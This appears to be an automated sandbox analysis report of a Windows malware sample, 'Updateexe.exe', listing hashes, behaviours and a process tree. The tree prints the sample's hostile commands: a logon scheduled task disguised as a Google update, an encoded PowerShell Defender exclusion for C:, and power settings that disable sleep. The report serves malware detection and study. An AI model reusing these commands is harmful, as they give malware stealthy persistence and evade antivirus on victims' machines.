Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
04/07/2023, 18:40
Static task
static1
Behavioral task
behavioral1
Sample
Updateexe.exe
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
Updateexe.exe
Resource
win10v2004-20230703-en
General
-
Target
Updateexe.exe
-
Size
591KB
-
MD5
53388f1619dda917dd62515d5ebca691
-
SHA1
cc5aeec69eada4166cc002d8232bb0114c671c22
-
SHA256
f9da54b2912742131ca8ae08a2a81895915109a21af8dbfb9dab6ead1481337d
-
SHA512
c42da1d9107316bf5da2fb9f72f717d363d203b39a9187713962e5289a80d76d7f8bcd6b37271c08a30f9b441aa49a23655ccbc16089f8a8a65d6e51774e9f53
-
SSDEEP
12288:/Hky2qkgHoX5RiI3igcaWdJiFfcv0SFWRQwk9G1vz:/H1QgHOLjigwbiFfcvGG59cb
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 4696 created 3164 4696 hdwmi.exe 38 PID 4696 created 3164 4696 hdwmi.exe 38 PID 4696 created 3164 4696 hdwmi.exe 38 PID 2244 created 3164 2244 updater.exe 38 PID 2244 created 3164 2244 updater.exe 38 PID 2244 created 3164 2244 updater.exe 38 PID 2244 created 3164 2244 updater.exe 38 -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 1776 Value.exe 4696 hdwmi.exe 2244 updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1776 set thread context of 3624 1776 Value.exe 84 PID 2244 set thread context of 5036 2244 updater.exe 105 PID 2244 set thread context of 3680 2244 updater.exe 106 -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 1284 powershell.exe 1284 powershell.exe 1776 Value.exe 1776 Value.exe 4696 hdwmi.exe 4696 hdwmi.exe 4696 hdwmi.exe 4696 hdwmi.exe 3056 powershell.exe 3056 powershell.exe 4696 hdwmi.exe 4696 hdwmi.exe 2244 updater.exe 2244 updater.exe 2244 updater.exe 2244 updater.exe 3724 powershell.exe 3724 powershell.exe 2244 updater.exe 2244 updater.exe 2244 updater.exe 2244 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4952 Updateexe.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1776 Value.exe Token: SeDebugPrivilege 3624 InstallUtil.exe Token: SeShutdownPrivilege 1912 powercfg.exe Token: SeCreatePagefilePrivilege 1912 powercfg.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeShutdownPrivilege 1672 powercfg.exe Token: SeCreatePagefilePrivilege 1672 powercfg.exe Token: SeShutdownPrivilege 3824 powercfg.exe Token: SeCreatePagefilePrivilege 3824 powercfg.exe Token: SeShutdownPrivilege 4796 powercfg.exe Token: SeCreatePagefilePrivilege 4796 powercfg.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe Token: SeBackupPrivilege 3056 powershell.exe Token: SeRestorePrivilege 3056 powershell.exe Token: SeShutdownPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeSystemEnvironmentPrivilege 3056 powershell.exe Token: SeRemoteShutdownPrivilege 3056 powershell.exe Token: SeUndockPrivilege 3056 powershell.exe Token: SeManageVolumePrivilege 3056 powershell.exe Token: 33 3056 powershell.exe Token: 34 3056 powershell.exe Token: 35 3056 powershell.exe Token: 36 3056 powershell.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe Token: SeBackupPrivilege 3056 powershell.exe Token: SeRestorePrivilege 3056 powershell.exe Token: SeShutdownPrivilege 3056 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeSystemEnvironmentPrivilege 3056 powershell.exe Token: SeRemoteShutdownPrivilege 3056 powershell.exe Token: SeUndockPrivilege 3056 powershell.exe Token: SeManageVolumePrivilege 3056 powershell.exe Token: 33 3056 powershell.exe Token: 34 3056 powershell.exe Token: 35 3056 powershell.exe Token: 36 3056 powershell.exe Token: SeIncreaseQuotaPrivilege 3056 powershell.exe Token: SeSecurityPrivilege 3056 powershell.exe Token: SeTakeOwnershipPrivilege 3056 powershell.exe Token: SeLoadDriverPrivilege 3056 powershell.exe Token: SeSystemProfilePrivilege 3056 powershell.exe Token: SeSystemtimePrivilege 3056 powershell.exe Token: SeProfSingleProcessPrivilege 3056 powershell.exe Token: SeIncBasePriorityPrivilege 3056 powershell.exe Token: SeCreatePagefilePrivilege 3056 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 1776 wrote to memory of 3624 1776 Value.exe 84 PID 2824 wrote to memory of 1912 2824 cmd.exe 90 PID 2824 wrote to memory of 1912 2824 cmd.exe 90 PID 2824 wrote to memory of 1672 2824 cmd.exe 91 PID 2824 wrote to memory of 1672 2824 cmd.exe 91 PID 2824 wrote to memory of 3824 2824 cmd.exe 92 PID 2824 wrote to memory of 3824 2824 cmd.exe 92 PID 2824 wrote to memory of 4796 2824 cmd.exe 93 PID 2824 wrote to memory of 4796 2824 cmd.exe 93 PID 3380 wrote to memory of 2760 3380 cmd.exe 101 PID 3380 wrote to memory of 2760 3380 cmd.exe 101 PID 3380 wrote to memory of 4136 3380 cmd.exe 102 PID 3380 wrote to memory of 4136 3380 cmd.exe 102 PID 3380 wrote to memory of 3836 3380 cmd.exe 103 PID 3380 wrote to memory of 3836 3380 cmd.exe 103 PID 3380 wrote to memory of 1780 3380 cmd.exe 104 PID 3380 wrote to memory of 1780 3380 cmd.exe 104 PID 2244 wrote to memory of 5036 2244 updater.exe 105 PID 2244 wrote to memory of 3680 2244 updater.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\Updateexe.exe"C:\Users\Admin\AppData\Local\Temp\Updateexe.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fiukzadu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4436
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2760
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4136
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3836
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1780
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fiukzadu#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3724
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:5036
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe2⤵PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
C:\Users\Admin\AppData\Local\Count\sudus\Value.exeC:\Users\Admin\AppData\Local\Count\sudus\Value.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\hdwmi.exeC:\Users\Admin\AppData\Local\Temp\hdwmi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4696
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2244
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
591KB
MD553388f1619dda917dd62515d5ebca691
SHA1cc5aeec69eada4166cc002d8232bb0114c671c22
SHA256f9da54b2912742131ca8ae08a2a81895915109a21af8dbfb9dab6ead1481337d
SHA512c42da1d9107316bf5da2fb9f72f717d363d203b39a9187713962e5289a80d76d7f8bcd6b37271c08a30f9b441aa49a23655ccbc16089f8a8a65d6e51774e9f53
-
Filesize
591KB
MD553388f1619dda917dd62515d5ebca691
SHA1cc5aeec69eada4166cc002d8232bb0114c671c22
SHA256f9da54b2912742131ca8ae08a2a81895915109a21af8dbfb9dab6ead1481337d
SHA512c42da1d9107316bf5da2fb9f72f717d363d203b39a9187713962e5289a80d76d7f8bcd6b37271c08a30f9b441aa49a23655ccbc16089f8a8a65d6e51774e9f53
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
1KB
MD5b6c1dd8c5ade1d86bb6772a96d5a65bb
SHA19edd35a11a7eee83d5e4d1edb6f63d0c36b1f45f
SHA25696c68492b33bc8f8a87aa7813eefc8c82990e0d0a3126e29bc0ee89b3b195c5d
SHA512c8010e0384cec5a0b355470ac663cf745ae086e01e97f184e09d5a2134224a6247f79d43fc2515f7b52b94452750d7229738be12f3e1f0e79da64186433417c0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9.8MB
MD547b23e6a12591b9da45e69c443c60047
SHA1c93142e757e8b433b8399c67c2683109206c38f6
SHA256184b289d4805a2ddb2ffee544da05890b7b9f30569cfceb1b19563b3a98f520e
SHA512bb9882ecd2c1361694709fbb6fe75a8f7c7b184762317d5a639b9f12b80528289c31ba8328514a8d46dfc62f54bf776baa516f97e248d4e1580ac3f43681fcb4
-
Filesize
9.8MB
MD547b23e6a12591b9da45e69c443c60047
SHA1c93142e757e8b433b8399c67c2683109206c38f6
SHA256184b289d4805a2ddb2ffee544da05890b7b9f30569cfceb1b19563b3a98f520e
SHA512bb9882ecd2c1361694709fbb6fe75a8f7c7b184762317d5a639b9f12b80528289c31ba8328514a8d46dfc62f54bf776baa516f97e248d4e1580ac3f43681fcb4
-
Filesize
9.8MB
MD547b23e6a12591b9da45e69c443c60047
SHA1c93142e757e8b433b8399c67c2683109206c38f6
SHA256184b289d4805a2ddb2ffee544da05890b7b9f30569cfceb1b19563b3a98f520e
SHA512bb9882ecd2c1361694709fbb6fe75a8f7c7b184762317d5a639b9f12b80528289c31ba8328514a8d46dfc62f54bf776baa516f97e248d4e1580ac3f43681fcb4
-
Filesize
9.8MB
MD547b23e6a12591b9da45e69c443c60047
SHA1c93142e757e8b433b8399c67c2683109206c38f6
SHA256184b289d4805a2ddb2ffee544da05890b7b9f30569cfceb1b19563b3a98f520e
SHA512bb9882ecd2c1361694709fbb6fe75a8f7c7b184762317d5a639b9f12b80528289c31ba8328514a8d46dfc62f54bf776baa516f97e248d4e1580ac3f43681fcb4